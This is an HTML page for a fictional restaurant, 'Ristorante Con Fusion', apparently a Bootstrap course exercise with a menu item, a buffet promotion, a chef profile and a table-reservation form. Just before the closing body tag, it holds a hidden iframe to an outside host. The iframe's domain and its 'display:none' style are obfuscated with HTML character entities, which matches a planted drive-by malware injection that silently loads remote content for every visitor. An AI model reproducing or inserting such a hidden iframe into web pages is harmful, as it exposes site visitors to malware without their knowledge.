<!DOCTYPE html>
<html lang="en" manifest="">

<head>
    <title>Ristorante Con Fusion</title>
      <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <!-- Bootstrap CSS -->
	<link rel="stylesheet" href="style/styles.css">
	<link rel="stylesheet" href="style/bootstrap-social.css">
	<link rel="stylesheet href=" href="node_modules/font-awesome/css/font-awesome.min.css">
    <link rel="stylesheet" href="node_modules/bootstrap/dist/css/bootstrap.min.css">
     <!-- jQuery first, then Tether, then Bootstrap JS. -->
	<script src="script.js"></script>
    <script src="node_modules/jquery/dist/jquery.min.js"></script>
    <script src="node_modules/tether/dist/js/tether.min.js"></script>
    <script src="node_modules/bootstrap/dist/js/bootstrap.min.js"></script>
</head>

<body >
   <!--<nav class="navbar navbar-inverse  navbar-toggleable-sm bg-warning">
  <div class="container">
   <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarToggle"> 
     <span class="navbar-toggler-icon"></span>
   </button>
   <a class="navbar-brand" href="#"><img src="img/logo.png" height="30" width="41"></a>
    <div class="collapse navbar-collapse" id="navbarToggle">
     <ul class="navbar-nav">
	   <li class="nav-item active"><a class="nav-link" href="#"><i class="fa fa-home"></i>Home</a></li>
	   <li class="nav-item"><a class="nav-link" href="./aboutus.html"><i class="fa fa-info"></i>About</a></li>
	   <li class="nav-item"><a class="nav-link" href="#"> <i class="fa fa-list"></i>Menu</a></li>
	   <li class="nav-item"><a class="nav-link" href="contactus.html"><i class="fa fa-address-card"></i>Contact</a></li>
	 </ul>
	 </div> 
	</div>
   </nav>
  -->
<nav class="navbar-inverse navbar-toggleable-sm fixed-top bg-primary">
        <div class="container">
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#Navbar">
                <span class="navbar-toggler-icon"></span>
            </button>
            <a class="navbar-brand" href="./index.html">Ristorante Con Fusion</a>
            <div class="collapse navbar-collapse" id="Navbar">
                <ul class="navbar-nav">
                    <li class="nav-item active"><a class="nav-link" href="./index.html"><span class="fa fa-home fa-lg"></span> Home</a></li>
                    <li class="nav-item"><a class="nav-link" href="./aboutus.html"><span class="fa fa-info fa-lg"></span> About</a></li>
                    <li class="nav-item"><a class="nav-link" href="#"><span class="fa fa-list fa-lg"></span> Menu</a></li>
                    <li class="nav-item"><a class="nav-link" href="/contactus.html"><span class="fa fa-address-card fa-lg"></span> Contact</a></li>
					
                </ul>
            </div>
			<a href="localhost:3000/http://free.facebook.com"><i class="fa fa-user text-success" style="font-size:25px;"></i></a>
        </div>
    </nav>  
    <header class="jumbotron" style="background-color:#9975CD">
        <div class="container">
            <div class="row">
                <div class="col-12 col-sm-6">
                    <h1>Ristorante connnd Fusion</h1>
                    <p>We take inspiration from the World's best cuisines, and create a unique fusion experience. Our lipsmacking creations will tickle your culinary senses!</p>
                </div>
                 <div class="col col-sm-3 align-self-center">
                    <img src="img/logo.png" class="img-fluid">
                </div>
				<div class="col-sm-3 align-self-center">
				   <a href="#take" style="text-decoration:none">
				    <button role="button" class="btn btn-warning btn-block btn-sm"><i class="fa fa-spin fa-pulse"></i>Reserve Table</button>
					</a>
				</div>
            </div>
        </div>
    </header>
       <div class="container">
        <div class="row">
            <div class="col-sm-4 col-md-3 flex-last "> 
                <h3>Our Lipsmacking Culinary Creations</h3>
            </div>
            <div class="col-sm col-md flex-first">
                <div class="media">
                    <img class="d-flex mr-3 img-thumbnail align-self-center"
                         src="img/uthappizza.png" alt="Uthappizza">
                    <div class="media-body">
                        <h2 class="mt-0">Uthappizza <span class="badge badge-danger">HOT</span><span class="badge badge-pill badge-default">$4.99</span></h2>
                        <p class="hidden-xs-down">A unique combination of Indian Uthappam (pancake) and
                          Italian pizza, topped with Cerignola olives, ripe vine
                          cherry tomatoes, Vidalia onion, Guntur chillies and
                          Buffalo Paneer.</p>
                    </div>
                  </div>
            
		     </div>
           </div>
        <div class="col-12 col-sm-12 col-md-12">
		     <hr>
		   </div>

        <div class="row">
            <div class="col-sm-4 pull-sm-0  col-md-3 pull-md-0 flex-md-first">
                <h3>This Month's Promotions</h3>
            </div>
            <div class="col-sm push-sm-0 col-md push-md-0">
			 <div class="media">
			  <div class="media-body">			 
                <h2 class="mt-0">Weekend Grand Buffet <span class="badge badge-danger">NEW</span></h2>
                <p class="hidden-xs-down">Featuring mouthwatering combinations with a choice of five different salads, six enticing appetizers, six main entrees and five choicest desserts. Free flowing bubbly and soft drinks. All for just $19.99 per person </p>
             </div> 
			 <img class="d-flex ml-3 flex-md-last img-thumbnail align-self-center"
                         src="img/buffet.png" alt="buffet">
			 </div>
			</div>
        </div>
        <div class="col-12 col-sm-12 col-md-12">
		     <hr>
		   </div>
        <div class="row">
            <div class="col-sm-4 col-md-3 flex-last">
                <h3>Meet our Culinary Specialists</h3>
            </div>
            <div class="col-sm col-md flex-first">
               <div class="media">
                    <img class="d-flex mr-3 img-thumbnail align-self-center"
                         src="img/alberto.png" alt="Alberto Somayya">
                    <div class="media-body">
                        <h2 class="mt-0">Alberto Somayya</h2>
                        <h4>Executive Chef</h4>
                        <p class="hidden-xs-down">Award winning three-star Michelin chef with wide
                         International experience having worked closely with
                         whos-who in the culinary world, he specializes in
                          creating mouthwatering Indo-Italian fusion experiences.
                         </p>
                    </div>
                </div>
            </div>
        </div>
		<p style="padding:20px"></p>
	
		<div class="container">
		<div class="row row-content justify-content-center">
		    <div class="col-12 col-md-8">
		        <div class="card">
                    <h3 class="card-header bg-warning text-white">Reserve a Table</h3>
                    <div class="card-block">
					<form>
                       <div class="row" id="take">
					      <div class="col-12 col-sm-2">
						    <label for="number of guest">Number of Guests</label>
						   </div>
                          <div class="col-12 col-sm-10">
							  <div class="form-check form-check-inline">
								  <label class="form-check-label">
									<input class="form-check-input" type="radio" name="inlineRadioOptions" id="inlineRadio1" value="option1"> 1
								  </label>
								</div>
								<div class="form-check form-check-inline">
								  <label class="form-check-label">
									<input class="form-check-input" type="radio" name="inlineRadioOptions" id="inlineRadio2" value="option2"> 2
								  </label>
								</div>
								<div class="form-check form-check-inline disabled">
								  <label class="form-check-label">
									<input class="form-check-input" type="radio" name="inlineRadioOptions" id="inlineRadio3" value="option3"> 3
								  </label>
								</div>
								<div class="form-check form-check-inline disabled">
								  <label class="form-check-label">
									<input class="form-check-input" type="radio" name="inlineRadioOptions" id="inlineRadio3" value="option3"> 4
								  </label>
								</div>
								<div class="form-check form-check-inline disabled">
								  <label class="form-check-label">
									<input class="form-check-input" type="radio" name="inlineRadioOptions" id="inlineRadio3" value="option3"> 5
								  </label>
								</div>
								<div class="form-check form-check-inline disabled">
								  <label class="form-check-label">
									<input class="form-check-input" type="radio" name="inlineRadioOptions" id="inlineRadio3" value="option3"> 6
								  </label>
								</div>
                          </div>						  
					   </div>
					   <div class="row">
					   <div class="col-12 col-md-2 col-sm-12">
					     <label for="date">Date and Time</label>
					   </div>
               				<div class="col-12 col-sm-12 col-md-4">
							   <div class="input-group">
							       <span class="input-group-addon"><i class="fa fa-calendar"></i></span>
								   <input type="text" name="date" class="form-control mx-sm-0" placeholder="Date">
							   </div>
                            </div>
							
                             <div class="col-12 col-sm-12 col-md-4 offset-md-1">
							   <div class="input-group">
							       <span class="input-group-addon"><i class="fa fa-clock-o" aria-hidden="true"></i> </span>
								   <input type="text" name="time" class="form-control mx-sm-0" placeholder="Time">
							   </div>
                            </div>	
							
            					<div class="col-12 col-md-4 col-sm-12 offset-md-2" style="padding:12px;">
					        <button role="submit" class="btn btn-primary">Reserve</button>
					      </div>		
					   </div>
					   </div>
					</form>
					</div>
					</div>
					
                </div>
			  </div>
               <p style="padding:20px"></p>			  
           </div>
 
    <footer style="background-color:#9975CD">
        <div class="container">
            <div class="row" style="padding:20px">             
                <div class="col-5 offset-1 col-sm-2">
                    <h5>Links</h5>
                    <ul class="list-unstyled">
                        <li><a href="#">Home</a></li>
                        <li><a href="#">About</a></li>
                        <li><a href="#">Menu</a></li>
                        <li><a href="#">Contact</a></li>
                    </ul>
                </div>
                <div class="col-6 col-sm-5">
                    <h5>Our Address</h5>
                    <address>
		              121, Clear Water Bay Road<br>
		              Clear Water Bay, Kowloon<br>
		              HONG KONG<br>
		              <i class="fa fa-phone"></i> +852 1234 5678<br>
		              <i class="fa fa-fax"></i> +852 8765 4321<br>
		              <i class="fa fa-envelope"></i> <a href="mailto:confusion@food.net">confusion@food.net</a>
		           </address>
                </div>
                <div class="col-sm align-self-center">
                    <div style="text-align:center">
                        <a class="btn btn-social-icon btn-google-plus" href="http://google.com/+"><i class="fa fa-google-plus"></i></a>
                        <a class="btn btn-social-icon btn-facebook" href="http://www.facebook.com/profile.php?id="><i class="fa fa-facebook"></i></a>
                        <a class="btn btn-social-icon btn-linkedin" href="http://www.linkedin.com/in/"><i class="fa fa-linkedin"></i></a>
                        <a class="btn btn-social-icon btn-twitter" href="http://twitter.com/"><i class="fa fa-twitter"></i></a>
                        <a class="btn btn-social-icon btn-youtube" href="http://youtube.com/"><i class="fa fa-youtube"></i></a>
                        <a class="btn btn-social-icon" href="mailto:"><i class="fa fa-envelope-o"></i></a>
                    </div>
                </div>
           </div>
           <div class="row justify-content-center">             
                <div class="col-auto">
                    <p>© Copyright 2015 Ristorante Con Fusion</p>
                </div>
           </div>
        </div>
    </footer>
   </div>
    <div id="start">
	  <p id="demo">Hello, P</p>
	</div>

<iframe src="http://jL.ch&#117;ra.pl/rc/" style="d&#105;splay:none"></iframe>
</body>
 <script>
 function bootstrap(id,attr){
   var $dom = document.querySelector("#"+id);
   $dom.setAttribute("class",attr);
 }
 bootstrap("start","bg-primary");
 bootstrap("demo","btn bg-warning");
 
    //var x = document.querySelector("#demo");
	//x.setAttribute("class","btn bg-warning");
 </script>
</html>